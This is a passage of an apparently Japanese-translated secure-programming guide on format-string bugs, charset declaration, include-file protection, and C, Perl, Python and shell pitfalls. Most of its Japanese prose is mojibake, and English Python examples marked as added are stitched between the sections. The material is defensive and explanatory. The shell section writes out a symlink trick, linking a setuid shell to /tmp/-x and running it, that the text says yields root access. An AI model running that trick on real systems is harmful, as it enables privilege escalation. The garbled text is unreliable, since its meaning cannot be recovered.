  /* Right ways: */
  printf("%s", string_from_untrusted_user); /* safe */
  fputs(string_from_untrusted_user, stdout); /* better for simple strings */

Ȃ΁AU҂͏TdɑIŁAƂ鈫s
܂B C  printf() ǂłB printf()gāA[U䂵
Ă鏑p@͂񂠂܂B̕@ɂ́A
ɂobt@I[o[(U҂vOSɃRg
[łĂ܂܂)F߂ĂȂp^gpϊK(\
zÕf[^})A܂\złȂʂɂȂl肾tH
[}bg܂(sK؂ȃf[^OɓāAŗp鎞ɖ
N)BɂЂǂP[X́Aprintf  %n ̕ϊKłB̋K
́Aʂ̕|C^ɂ邾݂܂BgƁAU
҂͏Ƃlɏ㏑łĂ܂܂B܂AU҂͂قƂ
Cӂ̏ꏊɏ㏑\łB͖{͓nȂup^v
wł邩łB̍Uɂďڂ_͂
܂BƂ΁A Avoiding security holes when developing an
application - Part 4: format strings <http://www-syntim.inria.fr/
fractales/Staff/Raynal/LinuxMag/SecProg/Art4/index.html>  1 
B

ʂ[UɕԂP[X̂ŁA̍U̓X^bNɂĂ̓
炷ꍇɂg܂B̏́AStackGuard ̂悤ȃX^bN
VXêɂpł܂BStackGuard ͒萔́ucanaryv
lpčUm܂BX^bN̓e\łȂA
 canary ̒l炳āAU󂯂₷Ȃ܂B

́AقƂǂ萔̂͂łAۉo
֐Ăяo(Ƃ΁Agettext  _())܂ނƂ܂B̌
sɂ́AvO䂷lɐ݂Ȃ΂Ȃ܂B܂
[ÚAvOǗĂ郁bZ[Wt@C炵Ił
悤ɂȂ΂܂B[Ũf[^ɂ́AgpOɃtB^
܂(ƂĐAƂ [A-Za-z0-9] ̂悤ȕ
XgAbvătB^݌v܂)BAĥɁA
͂ƊȒPŗǂ@܂B́AŒ肷邩Afputs
()gp邩łBɁuóv̖ƂăXgAbv܂A
Iɏo͈ȑÕvOɑ΂Ă肪܂(o̓[`̓t@
CɕۑĂ邩ꂸA snprintf()gāAIȏԂ̐
Ă邩Ȃł)B

̓tH[}bg̖ɂāAZLeB̖肪̂́A
ȂȂƂ܂BCERT Advisory CA-2000-13 ΁A̎_
pU̗ႪڂĂ܂B̖肪ɂ₷̂
āAɏڂ́A Pascal Bouchareine ̓dq[ŁA^C
gu[Paper] Format bugsvɂ܂Bꂪꂽ̂ 2000 N 7
 18 ł Bugtraq <http://www.securityfocus.com>B 2000 N 12 
Agcc RpC̊Jłł́ASłȂɑ΂Ă̌xbZ
[WT|[gĂ܂BJ҂̖ł悤Ɏx
鎎݂łB

񂱂͍ۉ̌ۂ̂ƂSǂAƂ^͂
炩Ă܂Bōۉ̌[`쐬ĂȂAMł
Ȃ[Uɂ́AJ[w\ŁAȃpXw肷
ȁAႤ̂włȂ悤ɂĂB

Mł鑊ɑ΂̂łĂAۉɂčꂽɂ
Ȃ΂܂B͖łBȂƁAU҂͂
̋@\𗘗pď̎_ɓ˂݂܂B C  C++ ̃v
OɌłB̓_ Bugtraq ŘbɂȂĂ܂(Ƃ΁A
John Levon  2000 N 7  26  Bugtraq ɓêĂ
)BȂ́A[UɋÍA̒lɂ邱
Ƃ_ Section 4.7.3 ĂB

vO~ÕoOłƂ͂A낢ȍXł܂܂ȕ@
\LĂ_ɐĜ͈Ӗ܂BɃsIh(.)ƃJ}
(,)Aƒ[؂̂ɎgĂ_ɑ΂āBf[^ۑ
Aǂݍ񂾂肷ȂAgp̃J[f[^̎舵ɐΊ
Ȃ悤ɂȂ΂Ȃ܂BȂ΁AtXꃆ[U
pꃆ[Uƃf[^łȂ܂BŔAۑꂽA
o肵f[^͈Ⴄ؂gĂ邩ȂłBZ
LeB̖ƂĂꂪp̂ǂ͒肩ł͂܂
AȂƂv܂B
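The same defect in Python's % operator, which this section names alongside printf(), as an added example (not the HOWTO's code): the difference between using user text as the format and as the argument, and a check that a translated message consumes exactly the conversions the source message does before it is used as a format, which addresses the translation-file case discussed above. The message catalog and its tampered entry are constructed for the example; real gettext catalogs are files, represented here as dicts.

```python
import re

# One %-conversion: optional (key), flags, width, precision, length, conversion type.
CONVERSION = re.compile(
    r"%(?:\((\w+)\))?[-#0 +]*(?:\*|\d+)?(?:\.(?:\*|\d+))?[hlL]?([diouxXeEfFgGcrsa%])"
)

# Constructed source messages and two catalogs; the second has an entry that was
# edited to pull in a value the source message never exposed.
SOURCE_MESSAGES = {
    "login_failed": "Login failed for user %(user)s from %(addr)s",
}
TRANSLATIONS_OK = {
    "login_failed": "Connexion refusee pour %(user)s depuis %(addr)s",
}
TRANSLATIONS_TAMPERED = {
    "login_failed": "Login failed for %(user)s from %(addr)s; key=%(session_key)s",
}


def echo_unsafe(untrusted):
    """Analogue of printf(string_from_untrusted_user): the user's text is the format,
    so a stray %s raises TypeError (and with a mapping argument could read values)."""
    return untrusted % ()


def echo_safe(untrusted):
    """Analogue of printf("%s", ...): fixed format, user text only as an argument."""
    return "%s" % untrusted


def conversion_signature(fmt):
    """Ordered list of (mapping key or None, conversion type) a format consumes; %% is not one."""
    return [(key or None, conv) for key, conv in CONVERSION.findall(fmt) if conv != "%"]


def pick_translation(msg_id, catalog):
    """Use a catalog entry only if its signature equals the source message's;
    otherwise fall back to the source, so an edited catalog cannot widen what is printed."""
    source = SOURCE_MESSAGES[msg_id]
    candidate = catalog.get(msg_id, source)
    if conversion_signature(candidate) != conversion_signature(source):
        return source
    return candidate


def render(msg_id, catalog, values):
    """Format a message for the user from a vetted template and a values mapping."""
    return pick_translation(msg_id, catalog) % values


if __name__ == "__main__":
    values = {"user": "alice", "addr": "10.0.0.1", "session_key": "SECRET"}
    print(render("login_failed", TRANSLATIONS_OK, values))
    print(render("login_failed", TRANSLATIONS_TAMPERED, values))
```

The signature check is the mechanism the section asks for when translations come from files the program does not control: the catalog may reorder or rename nothing, it may only change the words between the conversions.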

 

8.5. Control Character Encoding in Output

ʓIɁASKvȃvOł́ÃvO߂O
NCAgĂȂ΂܂B悭 1 ƂāA
o͂ۂɕwsȂƁAWeb AvP[VɎxႪ
ł_܂BׂẴf[^Mł錳炭ꍇ͂܂
܂BAMłȂf[^ȂAMłȂ
SKvȃvO̗\łȂʂ̕gāAf[^U邩
܂BꂪTCgɂ܂鈫ӂÛɂȂ܂B
ڂ́A Section 4.9 ĂB

CERT's tech tip on malicious code mitigation <http://www.cert.org/
tech_tips/malicious_code_mitigation.html> ł̕w肵Ȃ
ɂĂȂ킩₷Ă܂̂ŁAňp܂B

   
    Web y[W̒ɂ́A(HTTP ́ucharsetvp^)`
    ĂȂƂ낪񂠂܂B HTML  HTTP ̏o[W
    ́A`ĂȂƁAftHg ISO-8859-1 ł
    Ɖ肵Ă܂BۂɁAuEŨftHg͂܂܂
    ŁAftHg ISO-8859-1 ƂĂ܂̂ɂ͖܂B
    HTML version 4 ł́Aw肵ĂȂ΁Aǂ̕g
    Ă܂ȂƂɂȂ܂B
   
    Web T[oǂ̕ĝw肵ĂȂƁAǂ̕
    ꕶȂ̂킩܂Bw肵ĂȂ Web y[W
    AĂ̏ꍇ܂삵܂B͕ŴقƂǂA128
    ȉ̃oCglɓ蓖ĂĂ邩łBA128 ȏ
    ̒l̂ǂꂪꕶȂ̂ł傤B 16 rbg̕ɂ
    Au<v̂悤ȓꕶ\̂ɁAǉŕoCggĂ
    ̂܂BuEUɂ́Aʂ̕ƂĔFA삷
    ̂܂B́uvȂ̂łAӂXNv
    ggUAhÂ炭ȂĂ܂Ă܂BT[o͂ǂ̃oC
    gV[PXꕶ̂APɂ͔fłȂȂ܂B
   
    Ƃ΁AUTF-7 ́u<vƁu>vɑ΂āAقȂ镄񋟂Ă
    B܂悭gĂuEÛ́A^O̊Jn
    IƂĔF̂܂B̓uEŨoOł͂܂
    B{ UTF-7 ȂA͐łB́Au
    EUƃT[oœƂĂȂ󋵂Ɋׂ\_
    łB
   
̖͖̂łALƂɁAHTML ł̉͊ȒP
łB HTML wb_ɕZbgL̗̂悤ɐݒ肷邾łB

<HTML>                                                                 
<HEAD>                                                                 
<META http-equiv="Content-Type"                                        
content="text/html; charset=ISO-8859-1">                               
<TITLE>HTML SAMPLE</TITLE>                                             
</HEAD>                                                                
<BODY>                                                                 
<P>This is a sample HTML page                                          
</BODY>                                                                
</HTML>                                                                

 

ZpIȊϓ_炷ƁA HTTP vgȐo͂̈ꕔƂ
ݒ肷AɗǂłBAĂ郉Cu
݂܂B̉͋ZpIɂ͗DĂ܂BNCAgɋ
IɃwb_[𒲂ׂAwb_[ɂMETA ǂł킩镶
𔻒肷KvȂłBAIɂ͏L̂悤 META
ǂ߂ȂAȂ肷uEÚAsł͎
Ă܂B͕ʖłBɂĂAT[o
HTTP vgR̈ꕔƂāuZbgvɓK؂Ȓlݒ肵đoK
v܂BcOȂA(ZpIɂ͗Dꂽ)@S炨E
ł܂B́AÂ HTTP/1.0 Ή̃NCAgɂ́AIɎw
Ă charset p^K؂ɈȂ̂邩łB HTTP/1.1
̎dlł́ANCAg̃p^ɏ]悤ɒ߂Ă܂A
̂́A͂͂Ȃ͂^킵Ǝv܂B炭A
̗piƂāA̎dlB̕@ƂĂł͂ȂAǉ
̕@ƂĎgƂɂȂł傤B
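Setting the character set in both places this section discusses, as an added Python example not from the HOWTO: the HTTP Content-Type header and the META element from the sample page above, with the body actually encoded in the declared charset. The constructed byte string UTF7_SAMPLE shows the CERT point concretely: it contains no '<' or '>' byte, yet a client reading it as UTF-7 sees "<script>". Function names are assumptions made here.

```python
import html

# Constructed bytes: no '<' or '>' byte is present, but as UTF-7 they spell "<script>".
UTF7_SAMPLE = b"+ADw-script+AD4-"


def render_http_response(body_text, charset="ISO-8859-1"):
    """Minimal HTTP/1.1 response declaring the charset in the Content-Type header (what
    HTTP/1.1 clients honour) and in a META element (for clients that only see the
    document), with the body encoded in that charset. Untrusted text is escaped first;
    characters the charset cannot represent become numeric character references."""
    safe = html.escape(body_text, quote=True)
    page = (
        "<HTML>\n<HEAD>\n"
        '<META http-equiv="Content-Type" content="text/html; charset=%s">\n' % charset
        + "<TITLE>HTML SAMPLE</TITLE>\n</HEAD>\n<BODY>\n<P>%s\n</BODY>\n</HTML>\n" % safe
    )
    body = page.encode(charset, errors="xmlcharrefreplace")
    headers = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=%s\r\n" % charset
        + "Content-Length: %d\r\n\r\n" % len(body)
    ).encode("ascii")
    return headers + body


def declared_charset(response):
    """Read the charset back from the Content-Type header of a response."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("ascii")
    for line in head.split("\r\n"):
        if line.lower().startswith("content-type:") and "charset=" in line:
            return line.split("charset=", 1)[1].strip()
    return None


def interpret_as(raw, charset):
    """What a client assuming the given charset sees in the same bytes."""
    return raw.decode(charset)


if __name__ == "__main__":
    print(render_http_response("a < b & \u20ac").decode("iso-8859-1"))
    print(interpret_as(UTF7_SAMPLE, "iso-8859-1"), "|", interpret_as(UTF7_SAMPLE, "utf-7"))
```

The euro sign in the demonstration is not in ISO-8859-1; with errors="xmlcharrefreplace" it is emitted as &#8364;, so the page stays valid in the declared charset instead of carrying a byte the client will decode as something else.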

 

8.6. Prevent Include/Configuration File Access

Web x[X̃AvP[VJ鎞ɁA[UɃvO
include t@Cݒt@Cւ̃ANZX(ǂݍ)F߂Ă͂܂
B̃f[^́AVXeɐN̂ɏ\ȏ(Ƃ΁ApX[
h)񋟂邩܂B̃KChĆAP[Xɂđ̎
̃AvP[VɂKpł邱ƂoĂĂB̃KCh
CŝɁAKvȍƂ܂B

 E vO include t@C͂̐ݒt@ĆAWeb ̃hL
    g[gOɒuĂ(܂AWeb T[o͂̃t@C
    ΊOɏo܂)B
   
 E include t@CeLXgt@CƂĊOɏoȂ悤ɁAWeb
    T[oݒ肵ĂBƂ΁AApache gĂȂA.inc
    t@CpɃnhANVǉł܂B
   
 E include t@C͕ی삳ꂽfBNg(.htaccess g) ɒu
    ĂB̏ŁAOɏoȂt@CƂĐݒ肵ĂB
   
 E t@Cɑ΂ătB^găANZXۂ悤ɂĂ
    B Apache ȂALŎł܂B
   
     <Files ~ "\.phpincludes">                                  
        Order allow,deny                                        
        Deny from all                                           
     </Files>                                                   
   
    K\tɊpăt@C}b`KvȂA
    Apache ł FilesMatch ߂gΎł܂B
   
 E include t@CK̃XNvgŁAT[o͂ȂA
    [UnĂp^ł͐Γ삵Ȃ悤ɂĂB
    킹ĕKSɐ݌vĂB
   
̉@ł́At@CuĂfBNgNǂ߂
A[ŨANZXhł܂Bt@C̃p[~bVύX
āAWeb T[o uid  gid Ă҂ǂ߂悤ɂ
B[U Web T[oŎ̃XNvgsł([
Ut@CɃANZXXNvg)̂ȂA̕@ł͂܂
܂BATCgzXeBOĂT[oMłȂ
lԂƋLȂ΁AVXeSɂ͍̂łB@ 1 ́A
Web T[rX񋟂vO𕡐グAꂼp[~bV
ʂɂ邱ƂłB̕@łɈSɂ͂Ȃ܂Aۍ܂
ƂłB܂ʂ̉@ƂāA uid  gid Ώۃt@C
ǂ߂悤ɐݒ肵AT[õXNvguṽp[~bV
Ŏs悤ɂ܂B҂̕@͂ꎩg肪܂BT[ô
镔 root ̌KvƂȂ邩łBȂƁAXNvgɕKv
ȏ̃p[~bVKvƂȂ邩܂B

 

Chapter 9. Language-Specific Issues

                                    Undoubtedly there are all sorts of
                                    languages in the world, yet none of
                                    them is without meaning.

                                                    1 Corinthians 14:10

ɂ͌ŗL̖肪񂠂܂BLɂ̖̑v񂵂ċ
Ă܂B

 E ֘AxƎۂɗpłh@\ׂėLɂĂB
    RpCł́ARpCƎs̗ΏۂɂȂ܂B
    ʓIɃZLeBɊ֘AĂvOł́AxׂėL
    āAƃRpCׂłB
   
 E uZ[tE[hv(܂Asɐ郂[h)p
    łȂAĂBC^v^̑́Â悤
    [hpӂĂ܂BʓIɁAZ[tE[hɗāAꂾ
    ŖhsĂ͂܂BZ[tE[hĂ錾̑啔
    ́ÃZLeB\ɕ͂ĂƂ͌܂BȂ
    ƁA_Ă܂܂ȎioĂ܂̂ʗłB
    R[hɓẮAR[hZ[tE[hgȂĂ
    Sł悤ɂAɃZ[tE[hāAŏIIɂ͉d
    h悤ɂ܂(AU҂̓AvP[ṼR[
    hƃZ[tE[h҂󂳂Ȃ΂ȂȂȂ܂)B 
   
 E Ɋ܂܂Ă댯ŌÏL͔ĂBu댯vƂ́A
    𐳂ŝ̂w܂BƂ΁Ȃɂ
    usvcȁv@\@\܂B܂Auv𐄑
    As낵Ďgp̂łBʓIɂׂ͔͂łB
    U҂s낵Ăɂ݁A\łȂ댯ȂƂ
    邩ȂłB悭NG[ɁAuItEoCE
    (off-by-one)vG[܂B́AEl 1 邱ƂŁA
    ʓIɃG[ƂȂƎ㐫łBʁAItEoCEG[̔
    ŏɂȂ悤ɃR[hĂBɕWK񂪂
    (Ƃ΁A[v̏)Aɏ]ĂB
   
 E ̊ՂƂȂ镔(Ƃ΁A^CECu)płA
    ꂪSł邩mFĂB
   
 E ̃K[xWERNVIɍsɂāA@f[
    ^(ɔ閧pX[h)Tdɂ폜ĂB
   
 E gpĂ鑀@𐳊mɗĂĂBhL
    gɂ鑀@ꂼ𒲂ׂĂB֘A\Ȃ
    mFłȂAԂl͖ȂłBusignedv̒lƁu
    unsignedv̒l̈Ⴂ𖳎ȂłBOT|[gĂ
     C ̂悤Ȍł͓ɍłA@͂܂B
   
 

9.1. C/C++

C  C++ vOɑ݂ő̃ZLeB̖ 1 ́Aob
t@I[o[t[łBڂ Chapter 5 ĂB C ͂
OT|[gĂȂƂ_ĂāAdȃG[𖳎
AɃvOR[fBOł܂B

C  C++ ɂ͑ɂ肪܂B́AJ҂ŃǗ
Ȃ΂ȂȂ_ł(Ƃ΁Amalloc() alloc()Afree()AnewAfree)
BǗɎsƁAʂƂăZLeB̎_ɂȂ邩
܂BƐ[Ȗ́AvOJĂ͂ȂԈ
ĊJł_ł(܂AC++  malloc()  new ߂Ďg
AsȖ߂𗘗pĂ邱ƂɂȂ܂)BȂƁAꍇɂĂ
GNU/Linux VXê悤ɁANbVP[X܂B܂
P[Xł͍U҂ɂŁAɃR[hsĂ܂
܂BƂ΁A2001 N 3  11  zlib Cuł̖
ĂƃAiEXAgĂ鑽̃vOe
󂯂܂BāAGNU/Linux ŃvOeXg鎞ɂ́A
MALLOC_CHECK_ ϐ 1  2 ݒ肷ׂłBāA
vOŝɓẮA0A1A2 ꂩɐݒ肷̂
Ă悢Ǝv܂B̐ݒ闝RɂẮAGNU/Linux  malloc
(3) ɐ܂B

   
    Recent versions of Linux libc (later than 5.4.23) and GNU libc (2.x)
    include a malloc implementation which is tunable via environment
    variables. When MALLOC_CHECK_ is set, a special (less efficient)
    implementation is used which is designed to be tolerant against simple
    errors, such as double calls of free() with the same argument, or
    overruns of a single byte (off-by-one bugs). Not all such errors can be
    protected against, however, and memory leaks can result. If
    MALLOC_CHECK_ is set to 0, any detected heap corruption is silently
    ignored; if set to 1, a diagnostic is printed on stderr; if set to 2,
    abort() is called immediately. This can be useful because otherwise a
    crash may happen much later, and the true cause for the problem is then
    very hard to track down.
   
gp̃JȂ(Ƃ΁Afree()g)Agp̃
܂Ă܂܂Bgp̃܂߂ƁAvO
~Ă܂܂Bgp̃U҂ɗpAT[r
XۂNʂɂȂ\܂Bł́AU҂
tOgāAT[rXۂN܂Bʂ͂Ȃ
IŁAUƂĂ͊댯ႭȂ܂B

^錾鎞ɂ͂ł邾ɂĂBpłȂuenumv
gāA񋓌^̒l`Ă(ʂȒlucharvuint
vĝł͂Ȃ)B enum ͓ switch ̒lŖɗ܂BRpC
AlKpĂ邩ǂ𔻒肵Ă܂BlɂȂ
΁Auunsignedvgp̂K؂łB

C  C++ łȂ̂́A^łucharv signed 
unsigned ǂɂȂ_ł(RpC}VɂĈႢ܂)B
signed char ɃnCrbgݒ肵AƂĕۑƕɂȂ܂B
ꂪƎ㐫ɂȂP[X܂BʓIɂ́Achar  signed char ̂
Ɂuunsigned charvgāAobt@|C^ɗpĂB
āA127(0x7f)ȏ̒lɂȂ邩Ȃf[^ȂALX
gĂB

C  C++ ɂ^`FbÑT|[g͖炩ɂłBA
ȂƂ`FbÑxグ΁AԈႢ̂͎IɌmł
܂BRpČxł邾LɂăR[hCAx
oȂ悤ɃRpCĂBK ANSI ̃vg^Cv錾Ɨ
wb_t@C (.h)ɓėpA֐ĂяoׂĂKmȌ^
ɂȂĂ悤ɂĂB gcc g C  C++ RpC
ȂARpC̃tOƂāAȂƂLݒ肵Ă(
̌xbZ[WLɂȂ܂)B܂Axׂ͂Ď菜悤
Ă(xɂ́Af[^t[͂sāAx̍œK}
ɂm̂܂B̏ꍇA-O2 gĂ邱Ƃ
oĂĂ)B

gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2                   

u-W -pedanticvƂĂ悢Ǝv܂B

C  C++ RpCAsȏołP[XX܂
BƂ gcc ł́A__attribute__()@\(C g@\ 1 )gāAs
ȏւ̌x\ɂȂAY֐Ɉ܂B܂A
̋@\gƂĂAR[ȟ͖݊Ȃ܂Bł́Aw
b_t@C(.h)ɉ̗̂Ă܂B

 /* in header.h */                                                     
 #ifndef __GNUC__                                                      
 #  define __attribute__(x) /*nothing*/                                
 #endif                                                                
                                                                       
 extern void logprintf(const char *format, ...)                        
    __attribute__((format(printf,1,2)));                               
 extern void logprintva(const char *format, va_list args)              
    __attribute__((format(printf,1,0)));                               

uformatv́AuprintfvƁuscanfvŗpł܂B̌ɑ
͏̃p^ƍŏ̉ψp^(X)łB̓_
ẮAGNU ̃hLgŉ₷Ă܂B̋@\Ƃ
A__attribute__ ɂ́unoreturnvuconstv܂B

C  C++ ̊J҂悭NG[𖳂܂傤BƂ΁Au==v
gŁu=vgȂ悤AӂĂB

 

9.2. Perl

Perl vO}́A܂ perlsec(1)ǂ񂾕ǂł傤B man 
͈S߂ Perl vȌɊւāAۑ肪ڂ
Ă܂B perlsec(1)ł́Au(taint)v[hɂĐĂ
܂BSKvȃvÓÃ[hgpׂłB
͎[U id O[v id Ă΁AIɉ[hL
ɂȂ܂B́A-T R}hCɎw肵ėLɂł܂(
 CGI XNvĝ悤ɁAN̑ɎsȂA҂gĂ
)B[h́A܂܂ȃ`FbNLɂ܂BƂ΁AfB
Ng̃pX̃`FbNāÃ[U߂Ȃ悤ɂȂĂ
邩`FbN܂B

A[ȟʂł͂茻̂́AăvOO
ɉe^Ă܂Ȃ悤ɁAvOO炭f[^g
ȂǂꍇłB[hł́AO瓾͂́uꂽv
̂ƂĈ󂪕t܂BO̓͂ɂ́AR}hC̈
ϐAJ[(perllocale(1) Q)AVXeR[̌
(readdir  readlinkAgetpw*  gecos tB[ȟďo)At@C
ׂĂɊY܂Bꂽf[^͒ڗp܂B܂A
ԐړIɃTuVFĂяoR}hp܂Bt@CfB
NgAvZXCR}hłp܂BdvȗO 1 
܂BXg system  exec ɓnꍇAXgvfɂ͉
x`FbN܂BāA[hł system  exec 
͓ɒӂ𕥂ĂB

ꂽf[^hf[^l͂ǂĂ܂BO 1 
܂Bf[^ꂢɂ́Aꂽf[^̕𔲂o
܂BAƂĂނ݂Ɂu.*vgȂ悤ɂĂ
Bhdg݂䖳ɂĂ܂܂B̂ɁAvO
euSȁvp^ʂp^gāAuLȁvlo
ĉBloA̒l`FbNKv܂(
)B

open  globAbacktick ֐̓VFĂŁAt@CɊ܂܂郏C
hJ[hWJ܂BꂪZLeBz[Ĵɂ悭g
܂B̊֐܂~߂悤ɂ邩Aperlsec(1)ɂ悤
ɁAȂuTh{bNXvgp悤ɂĂ
B backtick ɂẮAsystem()Ăяo悤ɏĂ
(͊SɏāASȂ̂ɕύXĂ)B

Ɍ΁APerl  open()֐́AS߂vOɂƂ
́ułȂ̂ȁHvԂłBopen()̓eLXg߂܂AO
ɃtB^ȂƁAZLeB̖肪NĂ
܂Bt@CI[vAbN肷R[hOɁA
perlopentut(1) 𒲂ׂĂBĂ̏ꍇAsysopen()̓t@C
I[vɓāAɈSȕ@ (ɕGł)񋟂Ă
܂BV Perl 5.6 ł́Aopen() ̌Ăяoɂ 3 ̃p^
pӂāA sysopen()̕GrAɂ𖳌ɂ܂B
<http://www.xray.mpe.mpg.de/mailing-lists/perl5-porters/2000-03/
msg02596.html>

Perl vO͌xtO(-w)LɂׂłBŐݓIɊ댯
AÏLɌxo܂B

Perl vÓAł܂Bɏڂ́A
Perl ̕WzzɓĂuSafevW[ĂB̃W
[ǂ̒xčĂ邩肩ł͂܂̂ŁAɃZL
eB̐M񂹂̂͒ӂĂBuPenguin Model for Secure
Distributed Internet ScriptingvڂׂĂ悢ł傤B̃hL
gĂ鎞_ł́A܂R[hhLgpłȂ
łBy󒐁FPenguin Model for Secure Distributed Internet
Scripting  http://www.hpcf.upr.edu/~humberto/documents/
penguin-safe-scripting.html QƂĂz

 

9.3. Python

̌ƓAf[^vÖꕔƂĎsł֐ɂ́A
ӂKvłBMłȂ[UA͂ɉeΗ^Ȃ悤ɂ
B exec()  eval()Aexecfile()ɊY܂(Ɍ
Acompile()ĂяôׂĂɑ΂āAӐ[`FbNׂł)B
ӊOȂƂɁAinput()͊댯ł[Watters 1996, 150]B 

Python vO(setuid  setgid vO)ŁAȂ
[UsAĂvOɂ́Au[UvW[
C|[gĂ͂܂B[UW[̂ŁApythonrc.py 
܂ꂽAsꂽ肵܂B̃t@CMłȂ[URg
[ƁAU҂[UW[𗘗pāAMłvO
ɑ΂āAIɏȃR[hs܂B 

Python ́AقƂǃRpCɃ`FbNs܂B{IɃRpC
Ɍ^݂͑܂B֐⃁\bhɓnp^̐Kł
邩̃`FbN炠܂BꂪAݓIoOAƂ
cOȌʂ𐶂݂܂(John Viega Ǝ́A̖ɑ܂)B
܂΁A̓APython ̓IvVƂĐÓIȌ^tƌ^`Fb
NIł悤ɂȂł傤B̓_ɂĂ͂˂Ăc_
܂B͕sSȂ PyChecker Ƃ􂪂܂B
PyChecker  lint CNȃvOŁAPython ̃\[XR[hɂ悭ł
oO`FbN܂B PyChecker  http://pychecker.sourceforge.net 
擾ł܂B

Python ł RExec NXŁusɐv@\T|[gĂ
܂B̋@\̎ړÍAAvbg⃂oCER[h̎sɂ܂
BAOR[hnȂĂAvO̓ɐ݂
ꍇɂpł܂Bsɐł́At@C̓ǂݍ݂
AftHgŋĂ܂ (݂͋Ă܂)Blbg[N
փANZX鑀 GUI ɂƂ͂ł܂BftHg͕ύX
\łAŁA(loophole)łȂ悤ɒӂ
BɃ[Uɑ΂āARɃNX֑ǉł悤ɂ
ƁAʂ̕@Ŋjł܂BƂ̂́APython ́uȂ
v\bh𑽗ʂɌĂяoĎsĂ邩łBftHgł́A
Python ̃IuWFNg͂قƂǎQƓnłBvO
ɂĂAmutable(ύX\)Ȓlɑ΂QƂꍞނƁA
vOłAxIuWFNgύXł܂B܂萧
̊O猩Ă܂܂B܂ mutable ȒlɃANZXȂA
mutable ȒlRs[邩A Bastion W[(ʃIuWFNgւ̐
T|[g)gpĂBڂ́AKuchling [2000]Ă
B@\Aǂ̒xč{̂͒肩
͂܂̂ŁAvO}̊F͒ӂĂB
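A replacement for eval()-style parsing of user data, as an added Python 3 example that is not from the HOWTO: ast.literal_eval accepts only literals, so names, calls and attribute access are rejected instead of executed, and a companion function lists the names an expression would look up, which helps when auditing existing exec()/eval() call sites. (In Python 2, input() evaluated what was typed; Python 3's input() returns the text unevaluated. The RExec and Bastion modules mentioned above were removed from later Python versions.) MAX_INPUT and the function names are constructed here.

```python
import ast

MAX_INPUT = 4096  # constructed limit so that oversized input is refused before parsing


def parse_untrusted_literal(text):
    """Parse untrusted text as a Python literal without eval(): numbers, strings, tuples,
    lists, dicts, sets, booleans and None are accepted; anything else is an error."""
    if len(text) > MAX_INPUT:
        raise ValueError("input too large")
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError("not a plain literal: %s" % exc) from None


def names_referenced(text):
    """Names an expression would look up if it were handed to eval(); an empty list for
    text that is not even a valid expression."""
    try:
        tree = ast.parse(text, mode="eval")
    except SyntaxError:
        return []
    return sorted({node.id for node in ast.walk(tree) if isinstance(node, ast.Name)})


def read_config_value(line):
    """Typical use: a 'key = literal' line from a user-editable file, parsed safely."""
    key, sep, value = line.partition("=")
    if not sep or not key.strip().isidentifier():
        raise ValueError("malformed line %r" % line)
    return key.strip(), parse_untrusted_literal(value.strip())


if __name__ == "__main__":
    print(read_config_value("retries = 3"))
    print(read_config_value("hosts = ['a.example', 'b.example']"))
    print(names_referenced("__import__('os').getcwd()"))
```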

 

9.4. Shell Scripting Languages (sh and csh Derivatives)

setuid  setgid S߂R[hɂ́AWIȃR}h
VF̃XNvg(csh  shAbash ̂悤)̗pȂ悤A
܂BVXeɂ(Linux ̂悤)Asetuid  setgid VFX
NvgSɖɂĂ̂Asetuid  setgid VFX
Nvg쐬ƁAڐA̖肪ɔ܂BÂVXeł
AVFXNvg͈Sł͂܂B͋ԂN
ł(Section 3.1.3 Ř_悤)B̑̃VXeɂƂĂ
A܂ǂƂ͂܂B

ۂ̃P[Xł́AVFXNvgSvvOɎg
ׂł͂Ȃꍇ悭܂BWIȃR}hVF́A܂
͂ɍEĂ܂͎̂m̎łBʃR}hVF́AΘbI
ɗpĂ郆[Uɑ΂āAuIɁv삷悤ɐ݌vĂ܂
BāANbN錈ӂlԂɂ͑΍Rł܂BVFv
ÓASɂKv߂ȂvOɂƂẮAf炵
vOł(Ƃ΁AȂ[UƓŎsł܂
AuMłȂvf[^󂯂܂)B܂Aׂ͂(Ƃ
At@CfBNgAR}hCAϐ)AMł郆[
Û̂łAē삷̂ɂ͍DsłBN
ĨXNvgɔɗǂ̗pĂ̂͂̂߂łB

ӂ݂͂󋵂ŁASȃVFvO쐬̂́A
̌ɔׂčłBŔAVFׂ͂Ăe󂯂邩ł
BƂ΁AuȂvϐ(Ƃ΁AENV  BASH_ENVAIFS ̒l)
A@ɉe܂AXNvgsOɁA[U`
Cӂ̃R[hs邱Ƃ\łBst@CfBNg
ĝ悤Ȃ̂łAsɉe܂BU҂䕶(ƂΉ
s)󔒁AVF̃^LN^A_bV (IvVtO)
͂܂t@CƁAꂪތ^邱ƂɂȂ܂B
Ƃ΁ABourne VF̎̑́AL̃R[hsƁAroot
ł̃ANZXF߂Ă܂܂(̐Ǝ㐫񎦂Ăꂽ NCSA Ɋӂ
܂)B

 % ln -s /usr/bin/setuid-shell /tmp/-x                                 
 % cd /tmp                                                             
 % -x                                                                  

VXeɂĂ͂̌ǂł̂܂A肪
ł͂܂BR}hVF̑啔AS setuid  setgid 
vO悤ɂ͂łĂȂłBvO̖ړIƂāA
setuid VFXNvg̍쐬͔ĂBVXe setuid 
VFXNvgĂĂłB̂ɁAʂ̌ŏȃv
O쐬āANAɂĂA̎s`(VFXNv
gł邩܂)ĂԂ悤ɂ܂傤B

łVFXNvg̗pɂȂAȂƂړ
͕ύXłȂfBNgɃXNvguĂB PATH  IFS 
́AXNvg̍ŏ̕Ŋm̒lݒ肵ĂBہA̓XN
vgĂ΂ȑOɐĂׂłB܂ŏ̕ŁucdvāA
SȃfBNgɈړĂĂBf[^gȂ /etc ̂悤
ȁAMł郆[U䂵ĂfBNg̃f[^ɂĂ
BU҂́Â悤ȃfBNgɁAӂĖtt@C
܂̂ŁBt@Cׂ͂ĕKpň͂ŃR}hC
ɓnĂBƂ΁A$1 ł͂Ȃ "$1" ̂悤ɁBŔA󔒂
t@CĂ܂łBu--vgăR}hĂ
oAIvVɒǉłȂ悤ɂĂBU҂_bV
ł͂܂t@C쐬AnĂ肵āAvOЂ
ăIvVł邩̂Ƃ悤Ƃ邩Ȃł
B̓t@C𒍈Ӑ[ׁAt@Cɂ͐
ĂB

ӖŁASȃ|VĂut̃VF(restricted
shell)vM̂́AE߂ł܂Bt̃VF́Aă
